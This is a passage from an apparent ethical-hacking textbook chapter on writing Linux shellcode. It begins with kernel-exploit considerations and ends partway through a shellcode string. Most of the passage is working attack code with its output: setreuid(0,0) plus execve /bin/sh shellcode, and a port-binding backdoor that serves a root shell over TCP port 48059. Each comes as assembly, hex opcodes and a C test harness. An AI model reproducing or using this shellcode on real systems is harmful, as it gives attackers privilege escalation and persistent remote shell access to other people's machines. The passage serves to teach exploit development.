The next thing to consider is what you intend to do once you have code running within
the kernel. Unlike with user space, you certainly can’t do an execve and replace the current
process (the kernel in this case) with a process more to your liking. Also unlike with user
space, you will not have access to a large catalog of shared libraries from which to choose
functions that are useful to you. The notion of a system call ceases to exist in kernel space,
as code running in kernel space is already in “the system.” The only functions that you will
have access to initially will be those exported by the kernel. The interface to those functions
may or may not be published, depending on the operating system that you are dealing
with. An excellent source of information on the Windows kernel programming
interface is Gary Nebbett’s book Windows NT/2000 Native API Reference. Once you are
familiar with the native Windows API, you will still be faced with the problem of locating
all of the functions that you wish to make use of. In the case of the Windows kernel, techniques
similar to those used for locating functions in user space can be employed, as the
Windows kernel (ntoskrnl.exe) is itself a Portable Executable (PE) file.
Stability becomes a huge concern when developing kernel level exploits. As mentioned
previously, one wrong move in the kernel can bring down the entire system. Any shellcode
you use will need to take into account the effect your exploit will have on the thread that
you exploited. If the thread crashes or becomes unresponsive, the entire system may soon
follow. Proper cleanup is a very important piece of any kernel exploit. Another factor that
will influence the stability of the system is the state of any interrupt processing being conducted
by the kernel at the time of the exploit. Interrupts may need to be reenabled or
reset cleanly in order to allow the system to continue stable operation.
Ultimately, you may decide that the somewhat more forgiving environment of user
space is a more desirable place to be running code. This is exactly what many recent kernel
exploits do. By scanning the process list, a process with sufficiently high privileges
can be selected as a host for a new thread that will contain attacker-supplied code. Kernel
API functions can then be utilized to initialize and launch the new thread, which
runs in the context of the selected process.
While the low level details of kernel level exploits are beyond the scope of this book,
the fact that this is a rapidly evolving area is likely to make kernel exploitation tools and
techniques more and more accessible to the average security researcher. In the meantime,
the references listed next will serve as excellent starting points for those interested
in more detailed coverage of the topic.
References
Barnaby Jack http://research.eeye.com/html/Papers/download/StepIntoTheRing.pdf
Bugcheck and Skape www.uninformed.org/?v=3&a=4&t=txt
Gary Nebbett, Windows NT/2000 Native API Reference, Indianapolis: Sams Publishing, 2000
Chapter 9: Shellcode Strategies
PART III
CHAPTER 10 Writing Linux Shellcode
In this chapter, we will cover various aspects of Linux shellcode:
• Basic Linux Shellcode
• System Calls
• Exit System Call
• Setreuid System Call
• Shell-Spawning Shellcode with execve
• Implementing Port-Binding Shellcode
• Linux Socket Programming
• Assembly Program to Establish a Socket
• Test the Shellcode
• Implementing Reverse Connecting Shellcode
• Reverse Connecting C Program
• Reverse Connecting Assembly Program
• Encoding Shellcode
• Simple XOR Encoding
• Structure of Encoded Shellcode
• JMP/CALL XOR Decoder Example
• FNSTENV XOR Example
• Putting It All Together
• Automating Shellcode Generation with Metasploit
In the previous chapters, we used Aleph1’s ubiquitous shellcode. In this chapter, we will
learn to write our own. Although the previously shown shellcode works well in the examples,
the exercise of creating your own is worthwhile because there will be many situations
where the standard shellcode does not work and you will need to create your own.
Basic Linux Shellcode
The term “shellcode” refers to self-contained binary code that completes a task. The task
may range from issuing a system command to providing a shell back to the attacker, as
was the original purpose of shellcode.
There are basically three ways to write shellcode:
• Directly write the hex opcodes.
• Write a program in a high level language like C, compile it, and then disassemble
it to obtain the assembly instructions and hex opcodes.
• Write an assembly program, assemble the program, and then extract the hex
opcodes from the binary.
Writing the hex opcodes directly is a little extreme. We will start with learning the C
approach, but quickly move to writing assembly, then to extraction of the opcodes. In
any event, you will need to understand low level (kernel) functions such as read, write,
and execute. Since these system functions are performed at the kernel level, we will need
to learn a little about how user processes communicate with the kernel.
System Calls
The purpose of the operating system is to serve as a bridge between the user (process)
and the hardware. There are basically three ways to communicate with the operating system
kernel:
• Hardware interrupts For example, an asynchronous signal from the keyboard
• Hardware traps For example, the result of an illegal “divide by zero” error
• Software traps For example, the request for a process to be scheduled for
execution
Software traps are the most useful to ethical hackers because they provide a method
for the user process to communicate to the kernel. The kernel abstracts some basic system
level functions from the user and provides an interface through a system call.
Definitions for system calls can be found on a Linux system in the following file:
$ cat /usr/include/asm/unistd.h
#ifndef _ASM_I386_UNISTD_H_
#define _ASM_I386_UNISTD_H_
#define __NR_exit 1
...snip...
#define __NR_execve 11
...snip...
#define __NR_setreuid 70
...snip...
#define __NR_dup2 63
...snip...
#define __NR_socketcall 102
...snip...
#define __NR_exit_group 252
...snip...
In the next section, we will begin the process, starting with C.
Gray Hat Hacking: The Ethical Hacker’s Handbook
System Calls by C
At a C level, the programmer simply uses the system call interface by referring to the
function signature and supplying the proper number of parameters. The simplest way to
find out the function signature is to look up the function’s man page.
For example, to learn more about the execve system call, you would type
$ man 2 execve
This would display the following man page:
EXECVE(2) Linux Programmer's Manual EXECVE(2)
NAME
execve - execute program
SYNOPSIS
#include <unistd.h>
int execve(const char *filename, char *const argv [], char
*const envp[]);
DESCRIPTION
execve() executes the program pointed to by filename. filename
must be either a binary executable, or a script starting with a line of the
form "#! interpreter [arg]". In the latter case, the interpreter must be a
valid pathname for an executable which is not itself a script, which will
be invoked as interpreter [arg] filename.
argv is an array of argument strings passed to the new program.
envp is an array of strings, conventionally of the form key=value, which
are passed as environment to the new program. Both, argv and envp must
be terminated by a NULL pointer. The argument vector and environment can be
accessed by the called program's main function. execve()
does not return on success, and the text, data, bss, and stack of the
calling process are overwritten by that of the program loaded. The
program invoked inherits the calling process's PID, and any open file
descriptors that are not set to close on exec. Signals pending on the
calling process are cleared. Any signals set to be caught by the calling
process are reset to their default behaviour.
...snipped...
As the next section shows, the previous system call can be implemented directly with
assembly.
System Calls by Assembly
At an assembly level, the following registers are loaded to make a system call:
• eax Used to load the number of the system call (see unistd.h earlier)
• ebx Used for first parameter—ecx is used for second parameter, edx for third,
esi for fourth, and edi for fifth
If more than five parameters are required, an array of the parameters must be stored
in memory and the address of that array stored in ebx.
Once the registers are loaded, an int 0x80 assembly instruction is called to issue a
software interrupt, forcing the kernel to stop what it is doing and handle the interrupt.
The kernel first checks the parameters for correctness, then copies the register values to
kernel memory space and handles the interrupt by referring to the Interrupt Descriptor
Table (IDT).
The easiest way to understand this is to see an example, as in the next section.
Exit System Call
The first system call we will focus on executes exit(0). The signature of the exit system
call is as follows:
• eax 0x01 (from the unistd.h file earlier)
• ebx User-provided parameter (in this case 0)
Since this is our first attempt at writing system calls, we will start with C.
Starting with C
The following code will execute the function exit(0):
$ cat exit.c
#include <stdlib.h>
int main(){
exit(0);
}
Go ahead and compile the program. Use the -static flag to compile in the library call to
exit as well.
$ gcc -static -o exit exit.c
NOTE If you receive the following error, you do not have the glibc-static-devel
package installed on your system:
/usr/bin/ld: cannot find -lc
You can either install that rpm or try to remove the -static flag. Many recent
compilers will link in the exit call without the -static flag.
Now launch gdb in quiet mode (skip banner) with the -q flag. Start by setting a breakpoint
at the main function; then run the program with r. Finally, disassemble the _exit
function call with disass _exit.
$ gdb exit -q
(gdb) b main
Breakpoint 1 at 0x80481d6
(gdb) r
Starting program: /root/book/chapt11/exit
Breakpoint 1, 0x080481d6 in main ()
(gdb) disass _exit
Dump of assembler code for function _exit:
0x804c56c <_exit>: mov 0x4(%esp,1),%ebx
0x804c570 <_exit+4>: mov $0xfc,%eax
0x804c575 <_exit+9>: int $0x80
0x804c577 <_exit+11>: mov $0x1,%eax
0x804c57c <_exit+16>: int $0x80
0x804c57e <_exit+18>: hlt
0x804c57f <_exit+19>: nop
End of assembler dump.
(gdb) q
You can see that the function starts by loading our user argument into ebx (in our
case, 0). Next, line _exit+11 loads the value 0x1 into eax; then the interrupt (int $0x80)
is called at line _exit+16. Notice that the library first issues an additional call to
exit_group (0xfc, or syscall 252) at lines _exit+4 and _exit+9. The exit_group() call
terminates every thread in the calling process's thread group, not just the calling
thread. It comes from the libc packaged with this particular distribution of Linux, not
from our source code. That may be appropriate for an ordinary program, but we cannot
have extra system calls introduced into our shellcode. This is the reason that you
will need to learn to write your shellcode in assembly directly.
Move to Assembly
By looking at the preceding assembly, you will notice that there is no black magic here.
In fact, you could rewrite the exit(0) function call by simply using the assembly:
$ cat exit.asm
section .text ; start code section of assembly
global _start
_start: ; keeps the linker from complaining or guessing
xor eax, eax ; shortcut to zero out the eax register (safely)
xor ebx, ebx ; shortcut to zero out the ebx register, see note
mov al, 0x01 ; only affects one byte, stops padding of other 24 bits
int 0x80 ; call kernel to execute syscall
We have left out the exit_group(0) syscall as it is not necessary.
Later it will become important that we eliminate NULL bytes from our hex opcodes,
as they will terminate strings prematurely. We have used the instruction mov al, 0x01 to
eliminate NULL bytes. The instruction mov eax, 0x01 translates to hex B8 01 00 00 00
because the instruction automatically pads to 4 bytes. In our case, we only need to copy
1 byte, so the 8-bit equivalent of eax was used instead.
NOTE If you xor a number with itself, you get zero. This is preferable to
using something like mov eax, 0, because that operation leads to NULL bytes
in the opcodes, which will terminate our shellcode when we place it into a
string.
In the next section, we will put the pieces together.
Assemble, Link, and Test
Once we have the assembly file, we can assemble it with nasm, link it with ld, then execute
the file as shown:
$ nasm -f elf exit.asm
$ ld exit.o -o exit
$ ./exit
Not much happened, because we simply called exit(0), which exited the process
politely. Luckily for us, there is another way to verify.
Verify with strace
As in our previous example, you may need to verify the execution of a binary to ensure
the proper system calls were executed. The strace tool is helpful:
$ strace ./exit
execve("./exit", ["./exit"], [/* ... */]) = 0
_exit(0) = ?
As we can see, the _exit(0) syscall was executed! Now let’s try another system call.
setreuid System Call
As discussed in Chapter 7, the target of our attack will often be an SUID program. However,
well-written SUID programs will drop the higher privileges when not needed. In
this case, it may be necessary to restore those privileges before taking control. The
setreuid system call is used to restore (set) the process’s real and effective user IDs.
setreuid Signature
Remember, the highest privilege to have is that of root (0). The signature of the
setreuid(0,0) system call is as follows:
• eax 0x46 for syscall # 70 (from unistd.h file earlier)
• ebx First parameter, real user ID (ruid), in this case 0x0
• ecx Second parameter, effective user ID (euid), in this case 0x0
This time, we will start directly with the assembly.
Starting with Assembly
The following assembly file will execute the setreuid(0,0) system call:
$ cat setreuid.asm
section .text ; start the code section of the asm
global _start ; declare a global label
_start: ; keeps the linker from complaining or guessing
xor eax, eax ; clear the eax register, prepare for next line
mov al, 0x46 ; set the syscall value to decimal 70 or hex 46, one byte
xor ebx, ebx ; clear the ebx register, set to 0
xor ecx, ecx ; clear the ecx register, set to 0
int 0x80 ; call kernel to execute the syscall
mov al, 0x01 ; set the syscall number to 1 for exit()
int 0x80 ; call kernel to execute the syscall
As you can see, we simply load up the registers and call int 0x80. We finish the function
call with our exit(0) system call, which is simplified because ebx already contains
the value 0x0.
Assemble, Link, and Test
As usual, assemble the source file with nasm, link the file with ld, then execute the
binary:
$ nasm -f elf setreuid.asm
$ ld -o setreuid setreuid.o
$ ./setreuid
Verify with strace
Once again, it is difficult to tell what the program did; strace to the rescue:
# strace ./setreuid
execve("./setreuid", ["./setreuid"], [/* ... */]) = 0
setreuid(0, 0) = 0
_exit(0) = ?
Ah, just as we expected!
Shell-Spawning Shellcode with execve
There are several ways to execute a program on Linux systems. One of the most widely
used methods is to call the execve system call. For our purpose, we will use execve to execute
the /bin/sh program.
execve Syscall
As discussed in the man page at the beginning of this chapter, if we wish to execute the
/bin/sh program, we need to call the system call as follows:
char * shell[2]; //set up a temp array of two strings
shell[0]="/bin/sh"; //set the first element of the array to "/bin/sh"
shell[1]=NULL; //set the second element to NULL
execve(shell[0], shell, NULL); //actual call of execve
where the second parameter is a two-element array containing the string “/bin/sh” and
terminated with a NULL. Therefore, the signature of the execve(“/bin/sh”, [“/bin/sh”,
NULL], NULL) syscall is as follows:
• eax 0xb for syscall #11 (actually al:0xb to remove NULLs from opcodes)
• ebx The char * address of /bin/sh somewhere in accessible memory
• ecx The char * argv[], an address (to an array of strings) starting with the
address of the previously used /bin/sh and terminated with a NULL
• edx Simply a 0x0, since the char * envp[] argument may be NULL
The only tricky part here is the construction of the “/bin/sh” string and the use of its
address. We will use a clever trick by placing the string on the stack in two chunks and
then referencing the address of the stack to build the register values.
Starting with Assembly
The following assembly code executes setreuid(0,0), then calls execve “/bin/sh”:
$ cat sc2.asm
section .text ; start the code section of the asm
global _start ; declare a global label
_start: ; get in the habit of using code labels
;setreuid (0,0) ; as we have already seen…
xor eax, eax ; clear the eax register, prepare for next line
mov al, 0x46 ; set the syscall # to decimal 70 or hex 46, one byte
xor ebx, ebx ; clear the ebx register
xor ecx, ecx ; clear the ecx register
int 0x80 ; call the kernel to execute the syscall
;spawn shellcode with execve
xor eax, eax ; clears the eax register, sets to 0
push eax ; push a NULL value on the stack, value of eax
push 0x68732f2f ; push '//sh' onto the stack, padded with leading '/'
push 0x6e69622f ; push /bin onto the stack, notice strings in reverse
mov ebx, esp ; since esp now points to "/bin/sh", write to ebx
push eax ; eax is still NULL, let's terminate char ** argv on stack
push ebx ; still need a pointer to the address of '/bin/sh', use ebx
mov ecx, esp ; now esp holds the address of argv, move it to ecx
xor edx, edx ; set edx to zero (NULL), since envp is not needed
mov al, 0xb ; set the syscall # to decimal 11 or hex b, one byte
int 0x80 ; call the kernel to execute the syscall
As just shown, the /bin/sh string is pushed onto the stack in reverse order by first
pushing the terminating NULL value of the string, next by pushing the //sh (4 bytes are
required for alignment and the second / has no effect). Finally, the /bin is pushed onto
the stack. At this point, we have all that we need on the stack, so esp now points to the
location of /bin/sh. The rest is simply an elegant use of the stack and register values to
set up the arguments of the execve system call.
Assemble, Link, and Test
Let’s check our shellcode by assembling with nasm, linking with ld, making the program
an SUID, and then executing it:
$ nasm -f elf sc2.asm
$ ld -o sc2 sc2.o
$ sudo chown root sc2
$ sudo chmod +s sc2
$ ./sc2
sh-2.05b# exit
Wow! It worked!
Extracting the Hex Opcodes (Shellcode)
Remember, to use our new program within an exploit, we need to place our program
inside a string. To obtain the hex opcodes, we simply use the objdump tool with the -d
flag for disassembly:
$ objdump -d ./sc2
./sc2: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: 31 c0 xor %eax,%eax
8048082: b0 46 mov $0x46,%al
8048084: 31 db xor %ebx,%ebx
8048086: 31 c9 xor %ecx,%ecx
8048088: cd 80 int $0x80
804808a: 31 c0 xor %eax,%eax
804808c: 50 push %eax
804808d: 68 2f 2f 73 68 push $0x68732f2f
8048092: 68 2f 62 69 6e push $0x6e69622f
8048097: 89 e3 mov %esp,%ebx
8048099: 50 push %eax
804809a: 53 push %ebx
804809b: 89 e1 mov %esp,%ecx
804809d: 31 d2 xor %edx,%edx
804809f: b0 0b mov $0xb,%al
80480a1: cd 80 int $0x80
$
The most important thing about this printout is to verify that no NULL characters
(\x00) are present in the hex opcodes. If there are any NULL characters, the shellcode
will fail when we place it into a string for injection during an exploit.
NOTE The output of objdump is provided in AT&T (gas) format. As
discussed in Chapter 6, we can easily convert between the two formats (gas
and nasm). A close comparison between the code we wrote and the
provided gas format assembly shows no difference.
Testing the Shellcode
To ensure that our shellcode will execute when contained in a string, we can craft the following
test program. Notice how the string (sc) may be broken into separate lines, one
for each assembly instruction. This aids with understanding and is a good habit to get
into.
$ cat sc2.c
char sc[] = //white space, such as carriage returns don't matter
// setreuid(0,0)
"\x31\xc0" // xor %eax,%eax
"\xb0\x46" // mov $0x46,%al
"\x31\xdb" // xor %ebx,%ebx
"\x31\xc9" // xor %ecx,%ecx
"\xcd\x80" // int $0x80
// spawn shellcode with execve
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x50" // push %eax
"\x53" // push %ebx
"\x89\xe1" // mov %esp,%ecx
"\x31\xd2" // xor %edx,%edx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80"; // int $0x80 (;)terminates the string
int main()
{
void (*fp) (void); // declare a function pointer, fp
fp = (void (*)(void))sc; // set the address of fp to our shellcode
fp(); // execute the function (our shellcode)
}
This program first places the hex opcodes (shellcode) into a buffer called sc[]. Next
the main function allocates a function pointer called fp (simply a 4-byte integer that
serves as an address pointer, used to point at a function). The function pointer is then set
to the starting address of sc[]. Finally, the function (our shellcode) is executed.
Now compile and test the code:
$ gcc -o sc2 sc2.c
$ sudo chown root sc2
$ sudo chmod +s sc2
$ ./sc2
sh-2.05b# exit
exit
As expected, the same results are obtained. Congratulations, you can now write your
own shellcode!
References
Aleph One, “Smashing the Stack” www.phrack.org/archives/49/P49-14
Murat Balaban, Shellcode Demystified www.enderunix.org/docs/en/sc-en.txt
Jon Erickson, Hacking: The Art of Exploitation (San Francisco: No Starch Press, 2003)
Koziol et al., The Shellcoder’s Handbook (Indianapolis: Wiley Publishing, 2004)
Implementing Port-Binding Shellcode
As discussed in the last chapter, sometimes it is helpful to have your shellcode open a
port and bind a shell to that port. This allows the attacker to no longer rely on the port
that entry was gained on and provides a solid backdoor into the system.
Linux Socket Programming
Linux socket programming deserves a chapter to itself, if not an entire book. However, it
turns out that there are just a few things you need to know to get off the ground. The
finer details of Linux socket programming are beyond the scope of this book, but here
goes the short version. Buckle up again!
C Program to Establish a Socket
In C, the following header files need to be included into your source code to build
sockets:
#include <sys/socket.h>
#include <netinet/in.h>
The first concept to understand when building sockets is byte order.
IP Networks Use Network Byte Order
As we learned before, when programming on Linux systems, we need to understand that
data is stored into memory by writing the lower-order bytes first; this is called little-endian
notation. Just when you got used to that, you need to understand that IP networks
work by writing the high-order byte first; this is referred to as network byte order. In
practice, this is not difficult to work around. You simply need to remember that bytes
will be reversed into network byte order prior to being sent down the wire.
The second concept to understand when building sockets is the sockaddr structure.
sockaddr Structure
In C programs, structures are used to define an object that has characteristics contained
in variables. These characteristics or variables may be modified and the object may be
passed as an argument to functions. The basic structure used in building sockets is called
a sockaddr. The sockaddr looks like this:
struct sockaddr {
unsigned short sa_family; /*address family*/
char sa_data[14]; /*address data*/
};
The basic idea is to build a chunk of memory that holds all the critical information of
the socket, namely the type of address family used (in our case IP, Internet Protocol), the
IP address, and the port to be used. The last two elements are stored in the sa_data field.
To assist in referencing the fields of the structure, a more recent version of sockaddr
was developed: sockaddr_in. The sockaddr_in structure looks like this:
struct sockaddr_in {
short int sin_family; /* Address family */
unsigned short int sin_port; /* Port number */
struct in_addr sin_addr; /* Internet address */
unsigned char sin_zero[8]; /* 8 bytes of NULL padding for IP */
};
The first three fields of this structure must be defined by the user prior to establishing
a socket. We will be using an address family of 0x2, which corresponds to IP. The port
number and Internet address are stored in network byte order; the address family is not.
The port number is simply the hex representation of the port used, written high-order
byte first. On a little-endian host, the Internet address is obtained by writing the octets
of the IP (each in hex notation) in reverse order, starting with the fourth octet. For
example, 127.0.0.1 would be written 0x0100007F. The value of 0 in the sin_addr field
simply means all local addresses. The sin_zero field pads the size of the structure by
adding 8 NULL bytes. This may all sound intimidating, but in practice, we only need to
know that the structure is a chunk of memory used to store the address family type, port,
and IP address. Soon we will simply use the stack to build this chunk of memory.
Sockets
Sockets are defined as the binding of a port and an IP to a process. In our case, we will
most often be interested in binding a command shell process to a particular port and IP
on a system.
The basic steps to establish a socket are as follows (including C function calls):
1. Build a basic IP socket:
server=socket(2,1,0)
2. Build a sockaddr_in structure with IP and port:
struct sockaddr_in serv_addr; //structure to hold IP/port vals
serv_addr.sin_addr.s_addr=0;//set addresses of socket to all local IPs
serv_addr.sin_port=0xBBBB;//set port of socket, in this case to 48059
serv_addr.sin_family=2; //set native protocol family: IP
3. Bind the port and IP to the socket:
bind(server,(struct sockaddr *)&serv_addr,0x10)
4. Start the socket in listen mode; open the port and wait for a connection:
listen(server, 0)
5. When a connection is made, return a handle to the client:
client=accept(server, 0, 0)
6. Copy stdin, stdout, and stderr pipes to the connecting client:
dup2(client, 0), dup2(client, 1), dup2(client, 2)
7. Call normal execve shellcode, as in the first section of this chapter:
char * shell[2]; //set up a temp array of two strings
shell[0]="/bin/sh"; //set the first element of the array to "/bin/sh"
shell[1]=NULL; //set the second element to NULL
execve(shell[0], shell, NULL); //actual call of execve
port_bind.c
To demonstrate the building of sockets, let’s start with a basic C program:
$ cat ./port_bind.c
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
int main(){
char * shell[2]; //prep for execve call
int server,client; //file descriptor handles
struct sockaddr_in serv_addr; //structure to hold IP/port vals
server=socket(2,1,0); //build a local IP socket of type stream
serv_addr.sin_addr.s_addr=0;//set addresses of socket to all local
serv_addr.sin_port=0xBBBB;//set port of socket, 48059 here
serv_addr.sin_family=2; //set native protocol family: IP
bind(server,(struct sockaddr *)&serv_addr,0x10); //bind socket
listen(server,0); //enter listen state, wait for connect
client=accept(server,0,0);//when connect, return client handle
/*connect client pipes to stdin,stdout,stderr */
dup2(client,0); //connect stdin to client
dup2(client,1); //connect stdout to client
dup2(client,2); //connect stderr to client
shell[0]="/bin/sh"; //first argument to execve
shell[1]=0; //terminate array with NULL
execve(shell[0],shell,0); //pop a shell
}
This program first sets up some variables for later use, including the sockaddr_in
structure. The socket is initialized and its handle is returned into the server variable
(an int serves as the handle). Next the fields of the sockaddr_in structure are set. The
sockaddr_in structure is passed along with the server handle to the bind function
(which binds the process, port, and IP together). Then the socket is placed in the listen
state, meaning it waits for a connection on the bound port. When a connection is made,
accept returns a handle for that connection, which is stored in client. The stdin,
stdout, and stderr of the process are then duplicated onto the client handle, allowing
the client to communicate with the shell. Finally, a shell is popped and returned to the client.
Assembly Program to Establish a Socket
To summarize the previous section, the basic steps to establish a socket are
• server=socket(2,1,0)
• bind(server,(struct sockaddr *)&serv_addr,0x10)
• listen(server, 0)
• client=accept(server, 0, 0)
• dup2(client, 0), dup2(client, 1), dup2(client, 2)
• execve “/bin/sh”
There is only one more thing to understand before moving to the assembly.
socketcall System Call
In Linux, sockets are implemented by using the socketcall system call (102). The
socketcall system call takes two arguments:
• ebx An integer value, defined in /usr/include/linux/net.h
To build a basic socket, you will only need
• SYS_SOCKET 1
• SYS_BIND 2
• SYS_CONNECT 3
• SYS_LISTEN 4
• SYS_ACCEPT 5
• ecx A pointer to an array of arguments for the particular function
Believe it or not, you now have all you need to jump into assembly socket programs.
port_bind_asm.asm
Armed with this info, we are ready to start building the assembly of a basic program to
bind port 48059 on all local IP addresses and wait for connections. Once a connection is
gained, the program will spawn a shell and provide it to the connecting client.
NOTE The following code segment can seem intimidating, but it is quite
simple. Refer back to the previous sections, in particular the last section, and
realize that we are just implementing the system calls (one after another).
# cat ./port_bind_asm.asm
BITS 32
section .text
global _start
_start:
xor eax,eax ;clear eax
xor ebx,ebx ;clear ebx
xor edx,edx ;clear edx
;server=socket(2,1,0)
push eax ; third arg to socket: 0
push byte 0x1 ; second arg to socket: 1
push byte 0x2 ; first arg to socket: 2
mov ecx,esp ; set addr of array as 2nd arg to socketcall
inc bl ; set first arg to socketcall to # 1
mov al,102 ; call socketcall # 1: SYS_SOCKET
int 0x80 ; jump into kernel mode, execute the syscall
mov esi,eax ; store the return value (eax) into esi (server)
;bind(server,(struct sockaddr *)&serv_addr,0x10)
push edx ; still zero, serves as sin_addr of 0 (all local addresses)
push long 0xBBBB02BB ; build struct: port 0xBBBB, sin_family byte 02, filler byte BB
mov ecx,esp ; move addr struct (on stack) to ecx
push byte 0x10 ; begin the bind args, push 16 (size) on stack
push ecx ; save address of struct back on stack
push esi ; save server file descriptor (now in esi) to stack
mov ecx,esp ; set addr of array as 2nd arg to socketcall
inc bl ; set bl to # 2, first arg of socketcall
mov al,102 ; call socketcall # 2: SYS_BIND
int 0x80 ; jump into kernel mode, execute the syscall
;listen(server, 0)
push edx ; still zero, used to terminate the next value pushed
push esi ; file descriptor for server (esi) pushed to stack
mov ecx,esp ; set addr of array as 2nd arg to socketcall
mov bl,0x4 ; move 4 into bl, first arg of socketcall
mov al,102 ; call socketcall #4: SYS_LISTEN
int 0x80 ; jump into kernel mode, execute the syscall
;client=accept(server, 0, 0)
push edx ; still zero, third argument to accept pushed to stack
push edx ; still zero, second argument to accept pushed to stack
push esi ; saved file descriptor for server pushed to stack
mov ecx,esp ; args placed into ecx, serves as 2nd arg to socketcall
inc bl ; increment bl to 5, first arg of socketcall
mov al,102 ; call socketcall #5: SYS_ACCEPT
int 0x80 ; jump into kernel mode, execute the syscall
; prepare for dup2 commands, need client file handle saved in ebx
mov ebx,eax ; copied returned file descriptor of client to ebx
;dup2(client, 0)
xor ecx,ecx ; clear ecx
mov al,63 ; set eax to syscall number 63 (0x3f): dup2
int 0x80 ; jump into kernel mode, execute the syscall
;dup2(client, 1)
inc ecx ; increment ecx to 1
mov al,63 ; prepare for syscall to dup2:63
int 0x80 ; jump into kernel mode, execute the syscall
;dup2(client, 2)
inc ecx ; increment ecx to 2
mov al,63 ; prepare for syscall to dup2:63
int 0x80 ; jump into kernel mode, execute the syscall
;standard execve("/bin/sh"...
push edx
push long 0x68732f2f
push long 0x6e69622f
mov ebx,esp
push edx
push ebx
mov ecx,esp
mov al, 0x0b
int 0x80
#
That was quite a long piece of assembly, but you should be able to follow it by now.
NOTE Port 0xBBBB = decimal 48059. Feel free to change this value and
connect to any free port you like.
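If you do change the port, keep in mind that the two port bytes are stored most significant byte first, and that 0xBBBB was convenient because both bytes are identical. The following is a minimal sketch, not part of the original listing, that shows which bytes a given port turns into and whether either of them is a NULL. The function names port_to_wire and port_has_null_byte are made up for this illustration.

```c
#include <stdint.h>

/* Hypothetical helper (not from the book): split a TCP port into the two
 * bytes that are stored in the sockaddr, most significant byte first. */
void port_to_wire(uint16_t port, unsigned char out[2])
{
    out[0] = (unsigned char)(port >> 8);   /* high byte */
    out[1] = (unsigned char)(port & 0xff); /* low byte  */
}

/* Returns 1 if either byte of the port is 0x00, which would place a NULL
 * byte in the value pushed for the sockaddr structure. */
int port_has_null_byte(uint16_t port)
{
    return (port >> 8) == 0 || (port & 0xff) == 0;
}
```

For example, port 48059 yields the bytes BB BB, while port 80 yields 00 50 and would therefore introduce a NULL byte.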
Assemble the source file, link the program, and execute the binary.
# nasm -f elf port_bind_asm.asm
# ld -o port_bind_asm port_bind_asm.o
# ./port_bind_asm
At this point, we should have an open port: 48059. Let’s open another command
shell and check:
# netstat -pan |grep port_bind_asm
tcp 0 0 0.0.0.0:48059 0.0.0.0:* LISTEN
10656/port_bind
Looks good; now fire up netcat, connect to the socket, and issue a test command.
# nc localhost 48059
id
uid=0(root) gid=0(root) groups=0(root)
Yep, it worked as planned. Smile and pat yourself on the back; you earned it.
Test the Shellcode
Finally, we get to the port binding shellcode. We need to carefully extract the hex
opcodes and then test them by placing the shellcode into a string and executing it.
Extracting the Hex Opcodes
Once again, we fall back on using the objdump tool:
$ objdump -d ./port_bind_asm
./port_bind_asm: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: 31 c0 xor %eax,%eax
8048082: 31 db xor %ebx,%ebx
8048084: 31 d2 xor %edx,%edx
8048086: 50 push %eax
8048087: 6a 01 push $0x1
8048089: 6a 02 push $0x2
804808b: 89 e1 mov %esp,%ecx
804808d: fe c3 inc %bl
804808f: b0 66 mov $0x66,%al
8048091: cd 80 int $0x80
8048093: 89 c6 mov %eax,%esi
8048095: 52 push %edx
8048096: 68 bb 02 bb bb push $0xbbbb02bb
804809b: 89 e1 mov %esp,%ecx
804809d: 6a 10 push $0x10
804809f: 51 push %ecx
80480a0: 56 push %esi
80480a1: 89 e1 mov %esp,%ecx
80480a3: fe c3 inc %bl
80480a5: b0 66 mov $0x66,%al
80480a7: cd 80 int $0x80
80480a9: 52 push %edx
80480aa: 56 push %esi
80480ab: 89 e1 mov %esp,%ecx
80480ad: b3 04 mov $0x4,%bl
80480af: b0 66 mov $0x66,%al
80480b1: cd 80 int $0x80
80480b3: 52 push %edx
80480b4: 52 push %edx
80480b5: 56 push %esi
80480b6: 89 e1 mov %esp,%ecx
80480b8: fe c3 inc %bl
80480ba: b0 66 mov $0x66,%al
80480bc: cd 80 int $0x80
80480be: 89 c3 mov %eax,%ebx
80480c0: 31 c9 xor %ecx,%ecx
80480c2: b0 3f mov $0x3f,%al
80480c4: cd 80 int $0x80
80480c6: 41 inc %ecx
80480c7: b0 3f mov $0x3f,%al
80480c9: cd 80 int $0x80
80480cb: 41 inc %ecx
80480cc: b0 3f mov $0x3f,%al
80480ce: cd 80 int $0x80
80480d0: 52 push %edx
80480d1: 68 2f 2f 73 68 push $0x68732f2f
80480d6: 68 2f 62 69 6e push $0x6e69622f
80480db: 89 e3 mov %esp,%ebx
80480dd: 52 push %edx
80480de: 53 push %ebx
80480df: 89 e1 mov %esp,%ecx
80480e1: b0 0b mov $0xb,%al
80480e3: cd 80 int $0x80
A visual inspection verifies that we have no NULL characters (\x00), so we should be
good to go. Now fire up your favorite editor (hopefully vi) and turn the opcodes into
shellcode.
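A visual inspection works for a short listing, but it is easy to miss a byte. As a rough sketch (our own helper, not something from the original text), the check can be automated by scanning a byte buffer for any value on a list of bad characters. The name find_bad_byte is hypothetical. Note that the length is passed explicitly, because strlen would stop at the very NULL byte we are looking for.

```c
#include <stddef.h>

/* Hypothetical helper: return the index of the first byte in buf that is
 * listed in bad[], or -1 if no listed byte is present. */
long find_bad_byte(const unsigned char *buf, size_t len,
                   const unsigned char *bad, size_t nbad)
{
    size_t i, j;
    for (i = 0; i < len; i++) {
        for (j = 0; j < nbad; j++) {
            if (buf[i] == bad[j])
                return (long)i; /* offset of the offending byte */
        }
    }
    return -1; /* buffer is clean */
}
```

When checking a string literal, pass sizeof(array) - 1 as the length so that the terminating NULL added by the compiler is not counted.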
port_bind_sc.c
Once again, to test the shellcode, we will place it into a string and run a simple test program
to execute the shellcode:
# cat port_bind_sc.c
char sc[]= // our new port binding shellcode, all here to save pages
"\x31\xc0\x31\xdb\x31\xd2\x50\x6a\x01\x6a\x02\x89\xe1\xfe\xc3\xb0"
"\x66\xcd\x80\x89\xc6\x52\x68\xbb\x02\xbb\xbb\x89\xe1\x6a\x10\x51"
"\x56\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x52\x56\x89\xe1\xb3\x04\xb0"
